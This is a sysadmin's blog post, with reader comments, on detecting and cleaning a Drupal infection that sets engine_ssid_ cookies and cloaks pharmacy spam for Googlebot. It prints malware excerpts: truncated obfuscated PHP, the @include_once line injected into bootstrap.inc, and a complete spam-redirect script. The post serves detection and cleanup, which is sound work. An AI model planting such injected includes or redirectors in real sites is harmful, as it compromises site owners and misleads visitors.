Drupal engine_ssid_ And engine_ssl_ cookies: You’ve Been Hacked

Mattias Geniar, Monday, March 9, 2015 - last modified: Monday, April 27, 2015

If you're seeing the cookies engine_ssid_ and engine_ssl_ being set in your Drupal site, chances are your Drupal installation has been hacked.

Detecting the hack

If you open your Inspector tab in Chrome/Firefox, you can see the following cookies set for your site.

drupal_engine_ssid_cookies

The value of the engine_ssid_ cookie is always $randomstring_$timestamp, so a random value for everyone. Here are the values I've seen in the wild:

  • ieuakakai_ 1430161738
  • idoaeodaeiiaeeu_ 1430161738

You're most likely finding these cookies because you're investigating a caching issue, where your cache hit-rates are dropping. The reason is this cookie, as it sets a cookie with a unique timestamp for every visitor, invalidating every cache.

Alternatively, you may have become aware of the hack because your SEO results have been altered. More on that near the middle of this post.

Finding the infected files on the filesystem

My investigations have, on numerous installations, always lead to the directory misc/farbtastic/, where new PHP files were being dropped. Farbtastic is supposed to be jQuery Color Picker, so you wouldn't expect PHP files in here -- right?

$ ls -alh misc/farbtastic/*.php
-rw-r--r-- 1 user group 100K misc/farbtastic/cache.php
-rw-r--r-- 1 user group 297  misc/farbtastic/leftpanelsin.php

The content of those files is what you would expect: typical obfuscated PHP code.

$ more misc/farbtastic/cache.php
<?php $GLOBALS['_1850119110_']=Array(base64_decode('ZXJyb3JfcmV' .'wb3J0a' .'W' .'5n'),base64_decode('c3' .'RyX3Jlc' .'Gx' .'hY2U='),base
...

This piece of PHP code can do harm in 2 ways: either it's included in the Drupal codebase, calling it on every page load, or it's loaded as an AJAX request in the browser. This particular piece of infection is the former: it gets included in the bootstrap of Drupal, so it's present on every request made to the server.

$ more includes/bootstrap.inc
...
**
* First bootstrap phase: initialize configuration.
*/@include_once( DRUPAL_ROOT . '/misc/farbtastic/cache.php');
define('DRUPAL_BOOTSTRAP_CONFIGURATION', 0);

The Drupal bootstrap is what actually initialises the entire Drupal stack. By injecting it in there, this malware can be sure it's present on every PHP request processed by Drupal.

There should be actual bonus points awarded to this malware for adhering to the Drupal Coding Standards for its use of spaces and concatenation, although it's probably just a means for blending in better and staying hidden in the bootstrap file.

Update 12/3/2015, thanks to Dimitri in the comments.

There's also an infection in the includes/refresh.inc file, with more obfuscated code.

$ more includes/refresh.inc
...
$GLOBALS['_2008785826_']=Array(base64_decode('Z' .'XJ' .'yb' .'3' .'J' .'f' .'c' .'mVwb3J0' .'a' .'W5n'),base64_decode
...

What does the PHP code do?

Besides dropping in cookies that can mess up with your caching strategy, this infection can do quite a bit more. After all, just busting caches everywhere may be fun, but that doesn't get you anywhere.

There are 2 parts to this infection, one is a simple redirecter in the form of leftpanelsin.php, which I've prettified here.

$ more misc/farbtastic/leftpanelsin.php
<?php
if( $_REQUEST["q"] == "pharmacy") {
   header("Location: http://www.-removed-url-.com/?refid=xx&trackid=xx&q=". $_REQUEST["q"], true, 302);
}
else {
   header("Location: http://www.-removed-url-.com/catalog/Bestsellers/". $_REQUEST["q"] .".htm?refid=xx&trackid=xx&q=". $_REQUEST["q"], true, 302);
}
exit;
?>

The sole purpose of this files, is to be called directly via the browser. Most likely due to either a javascript <script> injection or an iframe. It'll redirect the browser/visitor to an affiliate site.

The more complicated piece of code is the cache.php file. You can find the original cache.php version here.

Farbtastic Drupal Hack

An attempt to deobfuscate the code can be found here.

Farbtastic Drupal Hack Deobfuscated

In both cases, it's still entirely unreadable. Someone went through great lengths to hide the true purpose of this script. No simple de-obfuscater can decode this, it would require a tremendous amount of work to get a readable version.

It is filled with $_GLOBAL's, random function names, math, arrays, ... Honestly, that something even comes out of it is a victory on its own.

What does the code do with Drupal content?

The most visual difference, is that it starts altering the SEO results of your website. It modifies the Description Meta tag on the site.

drupal_hacked_seo_results

If you browse the site normally, the engine_* cookies are set in your browser. If the Drupal hack code detects those cookies, it hides all evidence of the hack and considers you a "regular user".

However, if GoogleBot comes to browse the website, it advertises a drug store. And if you browse your own site with stripped cookies and using the GoogleBot User agent you'll see the malicious content.

$ curl http://www.domain.com/ -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

...

<div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even" property="content:encoded"><p>buy metformin generic <a href="/dapoxetine-online-uk">blog dapoxetine online uk</a> buy finpecia 5mg <a href="/buy-nolvadex-on-line">buy nolvadex on line</a>

Those links refer to a new page created by the malware, with more links to external drugstores. It's typical to see this page in the default Drupal layout, not the actual template used by the site.

drupal_hack_drugstore

Clever little code.

Finding The Source

How it got there? Most likely an out-of-date plugin. Or maybe Drupalgeddon. By looking at the timestamps of most of the infected files, this isn't a new breach. But it's something that appears to have been keeping quiet.

As far as I could tell, the only way to spot it were the included new Cookies on the site and the altered SEO results. No signs of abuse, nowhere in the access/maillogs, could be found.

Is this a botnet quietly starting to gain ground, or an old hack that just never got activated? I wish I could tell you, but I'm hoping for the latter.



Hi! My name is Mattias Geniar. I'm a Support Manager at Nucleus Hosting in Belgium, a general web geek, public speaker and podcaster. Currently working on DNS Spy. Follow me on Twitter as @mattiasgeniar.

I respect your privacy and you won't get spam. Ever.
Just a weekly newsletter about Linux and open source.

SysCast podcast

In the SysCast podcast I talk about Linux & open source projects, interview sysadmins or developers and discuss web-related technologies. A show by and for geeks!

cron.weekly newsletter

A weekly newsletter - delivered every Sunday - for Linux sysadmins and open source users. It helps keeps you informed about open source projects, Linux guides & tutorials and the latest news.

Share this post

Did you like this post? Will you help me share it on social media? Thanks!

Comments

Dimitri Steyaert Thursday, March 12, 2015 at 11:11 (permalink)

Your blogpost made my job easier today as I ran into this issue on a server of one of our customers.

In my case the file includes/refresh.inc (starting from the document root) contained the same-ish content as the cache.php. Did you notice the same?

Reply


    Mattias Geniar Thursday, March 12, 2015 at 11:36 (permalink)

    Correct, I somehow missed that file! I’ll update the blogpost with that info as well, thanks for letting me know!

    Reply


Bastien Lamoureux Thursday, March 12, 2015 at 15:37 (permalink)

found same files on our own webserver, but not using drupal. Using a Modx CMS.
How do you solve it? Just delete infected files?

Reply


    Mattias Geniar Thursday, March 12, 2015 at 18:20 (permalink)

    The safest bet would be to reinstall from scratch, install your plugins etc, import your database and test everything.

    Just removing the files probably isn’t a good idea, since the infection may be in _a lot_ of files, that are just very well hidden.

    Reply


Mike Wednesday, March 25, 2015 at 22:43 (permalink)

Our website (still on Drupal 7.23) had those 2 additional php files in the Farbtastic folder + the additions in both .inc files as listed above.

It wasn’t manifesting itself as a problem that was viewable on our actual website, but, I think, it was causing random Viagra ads to show up on select mobile browsers on both Android and iOS. It wasn’t every page on the website – only certain pages, and a mix of pages that had been updated recently and others that hadn’t been touched in years.

It was also messing up our Google search results – a string of Viagra keywords would show up when Google’s bot crawled our site. This was confirmed by using Google’s “Fetch as Google” tool, which showed the additional Viagra nonsense on the page – even though it didn’t show up [in the source code or on the viewable page] on any desktop viewings of our website.

It seems like the problem is solved – i.e. when I “Fetch as Google” on our website now, the Viagra stuff is gone. Fingers crossed.

Reply


Leave a Reply

Your email address will not be published. Required fields are marked *

Inbound links